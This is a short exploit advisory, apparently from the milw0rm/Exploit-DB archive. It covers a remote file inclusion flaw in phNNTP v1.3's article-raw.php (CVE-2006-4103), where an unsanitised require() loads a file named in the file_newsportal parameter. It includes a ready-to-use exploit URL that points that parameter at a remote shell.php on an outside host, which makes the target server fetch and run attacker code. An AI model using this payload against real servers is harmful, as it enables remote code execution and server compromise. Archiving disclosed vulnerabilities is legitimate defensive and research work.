phNNTP v1.3 Remote File Inclusion CreW: ToxiC Bug Found By Drago84 Source Code: http://freshmeat.net/redir/phnntp/16290/url_tgz/phNNTP-v1.3.tar.gz Problem Is: require("$file_newsportal"); Page Affect: article-raw.php Path: Declare file_newsportal ExP: http://server/Dir_phNNTP/article-raw.php?file_newsportal=http://www.evalsite.com/shell.php? Greatz: Str0ke # milw0rm.com [2006-08-08]
Related Exploits
Trying to match CVEs (1): CVE-2006-4103Trying to match OSVDBs (1): 27856
Trying to match setup file: bac03feed3b38d27c282e82656d5588c
Other Possible E-DB Search Terms: phNNTP 1.3, phNNTP
Date | D | V | Title | Author | No matches |
---|